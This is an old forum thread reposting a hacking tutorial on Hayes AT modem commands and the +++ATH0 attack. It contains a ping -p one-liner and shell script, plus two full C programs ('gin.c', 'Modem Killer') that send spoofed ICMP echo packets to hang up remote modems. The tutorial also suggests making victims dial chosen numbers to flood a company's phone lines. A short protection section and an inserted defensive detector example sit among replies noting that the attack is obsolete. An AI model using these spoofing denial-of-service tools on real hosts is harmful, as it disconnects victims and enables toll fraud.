Hayes, a long time ago, set down a standard for modem commands, which started to be followed by a lot of Modem Manufacturers and modems following this standard were called ‘Hayes Compatible’. This complete set of Modem Commands, which follows the Hayes Standard, is called the AT Command set.
Here, AT stands for Attention. It basically tends to say to the Modem, ‘OK, Mr Modem, you better pay attention as I have some commands for you to execute”. The ‘AT’ precedes all Modem commands with a few exceptions, which we will discuss later.
**********************
HACKING TRUTH: A very simple and basic example of an AT command, would be, the one which is issued when you dial into your ISP. You, see when you click on the ‘Connect’ Button, the DUN software sends the following command to your modem:
ATDT or ATDP command followed by the number you want to dial and enter.
Now, let us analyze various parts of the above command. The ‘AT’ tells the modem to pay attention. The second part tells the modem, what kind of dialing system to use. For Example, DT tells it to use dial by tone, while DP tells it to use pulse dial. And the last part is the number you want to dial.
NOTE: To issue commands to your modem, you need to be in Command mode of your communication package.
*********************
Your modem accepts commands only when it is in the command mode. A modem is always either in the command mode, or the on-line mode. When you boot up, your modem is by default in command mode. So, when your modem is in command mode, then all AT commands are considered to be commands, while in online mode, all commands are considered to be as data packets.
Now, we come to an interesting part. The above paragraph tells us that when we connect to the Internet, our modem is in the online mode and thus cannot accept any commands. So, this means that even if you know the IP Address of a person and send them a modem command string, then the modem will only treat it as normal data and will not react to it, as it is in online mode. So, for the modem to start accepting and start reacting to AT commands, it has to be switched to the command mode. This is where the escape sequence comes in.
When the modem is in the online mode, then it can be brought to the command mode by sending it the escape characters i.e. +++. Passing the escape characters will switch the modem to the command mode and it will start reacting to AT commands. On giving the escape character, the actual AT command need not have the string ‘AT’ and it need not end with ‘enter’.
************************
HACKING TRUTH: The modem can be returned to the on-line state after the escape sequence has been issued. To return the modem to the on-line state, you have to give the ATO command.
************************
This means, that if you know the IP Address of someone, then if you send the +++ string to it followed by the AT Modem command, then you could practically control it, remotely. You could disconnect the modem, change the Dial type, force it to dial a particular number etc etc.
More--->>
--------------------------------------------------------------------------------
Let me take an example to make it clearer. Now, H0 is the AT command, which instructs the modem to disconnect or hang-up. Now, normally, if you want to disconnect your own modem or a local modem, then you would issue the following command:
+++ATH0
This basically switched your modem from the online mode to the command mode, and then sends it the H0 command, which is the disconnect command and thus disconnects the modem.
This same command, if sent to a remote system, will disconnect it from the network!!!
Now, before I move on to how to implement this attack through a C program, let us see, how to do the same through ping.
The following command, works on most systems, but from the arguments, I believe it will not work on Win 9x machines.
ping -c 5 -p 2b2b2b415453323d32353526574f310d ip
For explanation of the above ping command, I suggest you read the man pages of your *nix box: Carolyn's note: this only works on Unix type computers, and will definitely work on Linux.
$>man ping
Also, the following is a shell script, which does the same for you:
#!/bin/sh
ping -p 2b2b2b415448300d $*
NOTE: This exploit or the ATH0 attacks do not work on all modems. It is not true that all old modems are vulnerable or all new modems are safe, it basically depends on brand to brand. For more details about how to protect your modem from such attacks, read the section titled ‘Protection’ in this manual.
More --->>
--------------------------------------------------------------------------------
More on modems...
There is a C program, from PacketStorm, which spoofs ICMP packets and performs the same attack.
The way the exploit works is that it hides escape/control sequences in an ICMP echo_request packet (it contains the string +++ATH0). The +++ sends the modem into escape mode (and if the guard time on the modem is set ridiculously low) it will go into command mode, and you can issue it an ATH0 to hang up. It works on the reply, because the target receives the echo_request packet, then duplicates the packet with a new timestamp, checksum and dest/source hosts and returns it to the sender; when it returns it, the string is sent to the modem, thus hanging it up. There are a few conditions that must be met for it to work (if you don't want to be vulnerable to this, fix these!)
1) target computer must not filter ICMP echo_request and must know how to reply to one if it gets one
2) target computer must be using a modem (you can't hang up DS3s, although I suppose you could hang up telco return connections..if you can find one)
3) target computer must have a vulnerable modem (i.e. guard time is set ridiculously low)
4) you have to be able to send spoofed packets (or..if you can't, I guess you can use your own address, but then the target knows where it came from)
In my experimenting, I have also devised various fun ways to use this program other than just nuking your buddy off IRC. In theory, it is possible to modify the program to do fun stuff like make the target call some number after it hangs up (i.e. +++ATH0,,,DT5551212 should make the modem hang up, pause for 6 seconds, then call 5551212). This is fun for obvious reasons. Then the next variation I came up with is a smurf-like implementation in which you could make a script to DoS a class C subnet with the number of your least favorite company; since most companies have 800 numbers, not only does this cause chaos to the phone bank, but also costs ~$.30 per call. But I don't condone any of those ideas of course; this is just for experimental/educational purposes only. If you fix your modems, none of this is possible, so get off your ass and fix it.
script kiddiez: here is your code... Carolyn's note: this only works on Unix type computers, and will definitely work on Linux.
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE
/*
* gin.c
* jpester@engr.csulb.edu
*/
#include <stdio.h>
#include <signal.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/time.h>
#define VERSION "1.2-05.05" //fixed old compiler compatibility problems
#define FRIEND "foo"
void usage( char *name );
void banner( void );
char *get_progname( char *fullname );
void done( int foo );
void gin( int port, struct sockaddr_in sin, struct sockaddr_in din );
unsigned short in_chksum( u_short *ipbuf, int iplen );
int main( int argc, char **argv )
{
struct hostent *sourceinfo, *destinfo;
struct sockaddr_in sin, din;
int sockfd, numpackets, i;
char *target, *source;
banner();
( argc < 4 ) ? usage( get_progname( argv[0] ) ) : ( void )NULL;
source = argv[1];
target = argv[2];
numpackets = ( atoi( argv[3] ) );
signal( SIGINT, done );
if( ( sourceinfo = gethostbyname( source ) ) == NULL )
{
printf( "cannot resolve source host!\n" );
exit( -1 );
}
memcpy( ( caddr_t )&sin.sin_addr, sourceinfo->h_addr,
sourceinfo->h_length );
sin.sin_family = AF_INET;
if( ( destinfo = gethostbyname( target ) ) == NULL )
{
printf( "cannot resolve destination host!\n" );
exit( -1 );
}
memcpy( ( caddr_t )&din.sin_addr, destinfo->h_addr,
destinfo->h_length );
din.sin_family = AF_INET;
if( ( sockfd = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) < 0 )
{
printf( "Cannot get raw socket, you must be root!\n" );
exit( -1 );
}
printf( "Source Host\t\t: %s\n", inet_ntoa( sin.sin_addr ) );
printf( "Target Host\t\t: %s\n", inet_ntoa( din.sin_addr ) );
printf( "Number\t\t\t: %d\n", numpackets );
printf( "Have some gin sucka" );
for( i = 0; i < numpackets; i++ )
gin( sockfd, sin, din );
printf( "\n\nsent %d packet%c...done\n", numpackets, ( numpackets > 1 ) ? 's' : ( char )NULL );
return 0;
}
void usage( char *name )
{
printf( "usage: %s <source host> <dest host> <num packets>\n[ http://www.rootshell.com/ ] \n\n", name );
exit( 0 );
}
void banner( void )
{
printf( "\ngin [ v%s ] /\\ by amputee\n", VERSION );
printf( "compiled for: %s\n\n", FRIEND );
}
char *get_progname( char *fullname )
{
char *retval = strrchr( fullname, '/' );
return retval ? ++retval : fullname;
}
void done( int foo )
{
puts( "Exiting...\n" );
exit( 1 );
}
void gin( int port, struct sockaddr_in sin, struct sockaddr_in din )
{
char *ginstring = "+++ATH0\r+++ATH0\r+++ATH0\r+++ATH0\r";
char *packet;
int total;
struct iphdr *ip;
struct icmphdr *icmp;
size_t msglen = sizeof( ginstring ), iphlen = sizeof( struct iphdr );
size_t icplen = sizeof( struct icmphdr ), timlen = sizeof( struct timeval );
int len = strlen( ginstring );
packet = ( char * )malloc( iphlen + icplen + len );
ip = ( struct iphdr * )packet;
icmp = ( struct icmphdr * )( packet + iphlen );
( void )gettimeofday( ( struct timeval * )&packet[( icplen + iphlen )], ( struct timezone * )NULL );
memcpy( ( packet + iphlen + icplen + timlen ), ginstring, ( len - 4 ) );
ip->tot_len = htons( iphlen + icplen + ( len - 4 ) + timlen );
ip->version = 4;
ip->ihl = 5;
ip->tos = 0;
ip->ttl = 255;
ip->protocol = IPPROTO_ICMP;
ip->saddr = sin.sin_addr.s_addr;
ip->daddr = din.sin_addr.s_addr;
ip->check = in_chksum( ( u_short * )ip, iphlen );
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = in_chksum( ( u_short * )icmp, ( icplen + ( len - 4 ) ) );
total = ( iphlen + icplen + timlen + len + 16 );
sendto( port, packet, total, 0,
( struct sockaddr * )&din, sizeof( struct sockaddr ) );
free( packet );
}
// stolen from smurf
unsigned short in_chksum( u_short *ipbuf, int iplen )
{
register int nleft = iplen;
register int sum = 0;
u_short answer = 0;
while( nleft > 1 )
{
sum += *ipbuf++;
nleft -= 2;
}
if( nleft == 1 )
{
*( u_char * )( &answer ) = *( u_char * )ipbuf;
sum += answer;
}
sum = ( sum >> 16 ) + ( sum + 0xffff );
sum += ( sum >> 16 );
answer = ~sum;
return( answer );
}
--- CUT HERE --- CUT HERE --- CUT HERE --- CUT HERE
Also note: some machines segfault when they run this, and setting the environment variable MALLOC_CHECK_ to 1 seems to solve this. And..this code will probably come out all offset and break when you try to compile it...so just fix it; it compiles fine (I use g++ -O3 -o gin gin.c).
__________________________________________
Yet, another program, (a better one) from their Archive: Carolyn's note: this only works on Unix type computers, and will definitely work on Linux.
/* Hi, this is basically a small C program to quickly use the +++ATH0 modem bug on a given target. This thing is handy because you do not have to go through the trouble of typing the ping string, and it spoofs, which is also quite handy.
Anyway, use this to disconnect most modems on ANY OS on the internet by sending an ICMP_ECHO_REQUEST with the contents of +++ATH0. The modem gets it and (since it's an ICMP ECHO) sends the same packet back and resets. It can be patched by setting the modem register S2 to such a value that turns the command mode of the modem off (255 will do). The modem will NOT execute the commands in the packets anymore and will function stably.
NOTE: Before you actually USE this program, turn off your OWN command mode, or else your modem will RESET upon trying to send the packets away. Put the statement S2=255 somewhere in your modem CALL STRING. It should look something like this: OK ATB0&C1&D2S2=255DT<Phone No.>
At least, it does so on my modem. Note that some modems will get into trouble with the command mode turned off. If this is the case, tough, you CANNOT use this program AND you ARE VULNERABLE to this attack.
This should be it, all you script kiddies, have fun. Do with this code whatever you want, it's way too simple and lame.
Have fun,
Scrippie
If you think this program is truly cool (which is not true) mail me at:
ronald.huizer@wxs.nl
The way to patch a modem has been added thanks to Ardrian Gonzales...
Some modems may disconnect when trying to use the patch.
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#define BUFFER 80
#define RESET "+++ATH0\x0d"
#define PATCH "+++ATH0H1TD112\x0d"
int resolve(const char *name, unsigned int port, struct sockaddr_in *addr);
unsigned short in_cksum(u_short *addr, int len);
int killmodem(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr, unsigned int type)
{
unsigned char *packet;
struct iphdr *ip;
struct icmphdr *icmp;
char *blah;
int rc;
int c;
int b=0;
switch(type)
{ case (0): { blah = RESET; break; }
case (1): { blah = PATCH; break; }
default: blah = RESET;
}
packet = (unsigned char *)malloc(sizeof(struct iphdr) +
sizeof(struct icmphdr) + BUFFER);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
for(c=0;c<(sizeof(struct iphdr)+ sizeof(struct icmphdr) + BUFFER);c++)
{
if(b==strlen(blah)) b=0;
packet[c]=blah[b];
b++;
}
/* This is the IP header of our packet. */
ip->ihl = 5;
ip->version = 4;
ip->tos = 0;
ip->id = htons(43210);
ip->frag_off = htons(0);
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + BUFFER);
ip->ttl = 25;
ip->protocol = IPPROTO_ICMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum((u_short *)ip, sizeof(struct iphdr));
icmp->type = ICMP_ECHO;
icmp->code = 0;
icmp->checksum = 0;
icmp->checksum = in_cksum((u_short *)icmp,sizeof(struct icmphdr) + BUFFER);
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + BUFFER,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
free(packet);
return(0);
}
int main(int argc, char **argv)
{
struct sockaddr_in dest_addr;
unsigned int i,sock,type;
unsigned long src_addr;
if(geteuid()!=0)
{
fprintf(stderr, "You must be ROOT in order to run this!\n");
return(-1);
}
printf("Modem Killer - Version 1.0b - Spoofable\n");
printf("By Scrippie\n");
if ((argc != 5)) {
printf("Use the following format:\n");
printf("%s <Spoof IP> <Target IP> <Number> <Type>\n", argv[0]);
printf("Where type means the type of the modem crash.\n");
printf("---------------------------------------------\n");
printf("Type 0: Makes the modem hangup\n");
printf("Type 1: Patches a modem against attacks\n");
printf("---------------------------------------------\n");
printf("Greetz, Scrippie\n");
return(-1);
}
switch(atoi(argv[4]))
{
case (0): { type = 0; break; }
case (1): { type = 1; break; }
default:{ printf("WRONG type you idiot!\n"); return(-1); }
}
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
fprintf(stderr,"No RAW sockets available...\n");
return(-1);
}
if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
src_addr = dest_addr.sin_addr.s_addr;
if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }
printf("Now sending the modem kill...\n");
for (i = 0;i < atoi(argv[3]);i++)
{
if (killmodem(sock, src_addr, &dest_addr, type) == -1)
{
fprintf(stderr,"Cannot send packet...\n");
return(-1);
}
usleep(10000);
}
}
/********************************************\
*** Of course, no one has EVER seen this piece of networking code before... ***
\********************************************/
int resolve(const char *name, unsigned int port, struct sockaddr_in *addr)
{
struct hostent *host;
memset(addr,0,sizeof(struct sockaddr_in));
addr->sin_family = AF_INET;
addr->sin_addr.s_addr = inet_addr(name);
if (addr->sin_addr.s_addr == -1) {
if (( host = gethostbyname(name) ) == NULL ) {
fprintf(stderr,"Unable to resolve host %s\n",name);
return(-1);
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}
addr->sin_port = htons(port);
return(0);
}
unsigned short in_cksum(u_short *addr, int len)
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
/* mop up an odd byte, if necessary */
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}
Protection
Well, protection from these attacks is quite simple. But I do suggest that before you read this section, you try the above attacks on yourself and see whether you are vulnerable or not. Anyway, to protect your modem from ATH0 attacks, or in other words to prevent it from switching from online mode to command mode, all you have to do is set your init string to: S2=255.
*******************
HACKING TRUTH: You can change the initialization settings of your modem in two different ways:
1. Through the Windows Registry (the kewl, but long way)
Go to the following registry key and change the Settings to the value you want it to be.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\Modem\0000\Init
2. Through the Modems option in the Control Panel (the shorter, but not so kewl method)
Simply click on: Start > Settings > Control Panel. Then right click on Modems, choose Properties > Configure > Connection > Advanced.
Then enter the string in the specified area.
*******************
This will make your modem safe from this kind of attack, as it will treat AT commands as data, due to the fact that it will remain in online mode and not switch to command mode. However, some very obsolete modems tend to remain unaffected by the above protection method and thus remain vulnerable. Also, I have heard that there are some Anti-Nuke protection programs which provide your system protection from ATH0 attacks. Try: www.anticode.com
And for complete information and documentation on Hayes Compatible AT commands, visit the following sites: www.modem.com and www.modemhelp.com
Modem Tips and Tricks
Remember the batch file virus that I showed how to code in one of my previous tutorials? Well, keeping in mind the power of DOS exhibited in that manual, here is yet another trick which shows you how to dial a connection or connect to the Internet with a simple single-line DOS command. The syntax of the command is (case sensitive):
rundll rnaui.dll,RnaDial ConnectionName
For example, if the connection name which I want to dial is MTNL, then the command which will pop up the Connection Dial Box would be:
C:\windows> rundll rnaui.dll,RnaDial MTNL
If you want the ‘Make New Connection’ Dialog box to pop up, then use the following command:
C:\windows>rundll rnaui.dll,RnaWizard /1
Source code included (and it worked a while back). I hope it is of some help.
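As an added example, not part of the thread or the pasted tutorial, here is the defender-side counterpart to the programs above: a small C check that parses a raw IPv4/ICMP echo packet, flags payloads carrying the Hayes "+++AT" escape that the tutorial's ping -p string and both C programs embed, and validates the ICMP checksum with the same one's-complement fold the posted in_cksum uses. Nothing is sent; the sample packets are constructed in memory with placeholder 10.0.0.x addresses, and the DET_* result codes and function names are my own.

```c
/* Added example (not from the thread): parses a raw IPv4/ICMP echo packet, flags
   payloads carrying the Hayes "+++AT" escape that the tutorial's ping -p string
   embeds, and checks the ICMP checksum. Nothing is sent; samples are built in memory. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#define DET_NOT_ICMP  0  /* not an IPv4 ICMP echo request/reply */
#define DET_CLEAN     1  /* echo packet with no escape sequence in its payload */
#define DET_BAD_CKSUM 2  /* escape present but checksum invalid: the stack drops it */
#define DET_ESCAPE    3  /* valid echo carrying +++AT: a reply would feed it to a modem */
uint8_t sample_pkt[128];  /* scratch buffer for the constructed samples */

/* RFC 1071 checksum; over a message whose checksum field is filled in it returns 0. */
uint16_t inet_cksum(const uint8_t *buf, size_t len)
{
    uint32_t sum = 0;
    for (; len > 1; len -= 2, buf += 2)
        sum += ((uint32_t)buf[0] << 8) | buf[1];
    if (len == 1)                        /* odd trailing byte, as in the page's code */
        sum += (uint32_t)buf[0] << 8;
    sum = (sum >> 16) + (sum & 0xffff);  /* fold the carries back into 16 bits */
    sum += sum >> 16;
    return (uint16_t)~sum;
}

/* Classify one raw IPv4 packet (no link-layer header). */
int classify_icmp(const uint8_t *pkt, size_t len)
{
    if (len < 28 || (pkt[0] >> 4) != 4 || pkt[9] != 1) return DET_NOT_ICMP;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || len < ihl + 8) return DET_NOT_ICMP;
    const uint8_t *icmp = pkt + ihl;
    size_t ilen = len - ihl;
    if (icmp[0] != 8 && icmp[0] != 0) return DET_NOT_ICMP;  /* echo request/reply only */
    int found = 0;
    for (size_t i = 8; i + 5 <= ilen; i++)  /* the escape may follow ping's timestamp */
        if (memcmp(icmp + i, "+++AT", 5) == 0) { found = 1; break; }
    if (!found) return DET_CLEAN;
    return inet_cksum(icmp, ilen) == 0 ? DET_ESCAPE : DET_BAD_CKSUM;
}

/* Constructed sample: an echo request whose payload repeats pattern, as ping -p
   does, with placeholder addresses 10.0.0.1 -> 10.0.0.2. Returns the packet length. */
size_t build_echo(uint8_t *out, const char *pattern, size_t payload_len)
{
    static const uint8_t addrs[8] = { 10, 0, 0, 1, 10, 0, 0, 2 };
    size_t plen = strlen(pattern), total = 28 + payload_len;
    memset(out, 0, total);
    out[0] = 0x45; out[2] = (uint8_t)(total >> 8); out[3] = (uint8_t)total;
    out[8] = 64; out[9] = 1; memcpy(out + 12, addrs, 8);  /* TTL, ICMP, src/dst */
    uint16_t c = inet_cksum(out, 20); out[10] = (uint8_t)(c >> 8); out[11] = (uint8_t)c;
    out[20] = 8;  /* ICMP_ECHO; id/seq left zero */
    for (size_t i = 0; i < payload_len; i++) out[28 + i] = (uint8_t)pattern[i % plen];
    c = inet_cksum(out + 20, 8 + payload_len); out[22] = (uint8_t)(c >> 8); out[23] = (uint8_t)c;
    return total;
}
```

Feeding captured echo requests and replies through classify_icmp gives a DET_ESCAPE hit for exactly the packets a vulnerable modem (S2 not set to 255) would act on; the checksum fold is the same one both posted programs carry.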
-
December 13th, 2001, 05:24 AM
#7
Member
1. yes, modem jammers are A. obsolete B. only in movies
2. I just got to thinking, and wouldn't it be nice, instead of pasting an entire tutorial (twice), how about only once?
-
December 13th, 2001, 05:36 PM
#8
Originally posted by dfgt5
1. yes, modem jammers are A. obsolete B. only in movies
2. I just got to thinking, and wouldn't it be nice, instead of pasting an entire tutorial (twice), how about only once?
Right...sorry, I don't know how it got posted twice hmmmmmm
anyway, it was the wrong post for it to happen on
-
December 15th, 2001, 09:41 PM
#9
Junior Member
Yeah, thank u, that was helpful.
-
December 15th, 2001, 09:51 PM
#10
Junior Member
Originally posted by oddvector
I'm not sure what you mean by modem jammer.
There is no way to stop a phone trace from a modem.
There are some programs out there that can make older unprotected modems hang up. They do this by sending the hang up at command in a ping. Fortunately that sort of tech is obsolete now, most new modems won't accept at commands over tcp/ip anymore.
__________________________________________________
I agree with u that there is no way to stop tracing a call, but since I am not interested much in phreahacking, I just want to be sure about it, because I have downloaded a program that calls itself a modem jammer but I couldn't figure out what it does!
Any way I will post my zip file, test it
Any way thank u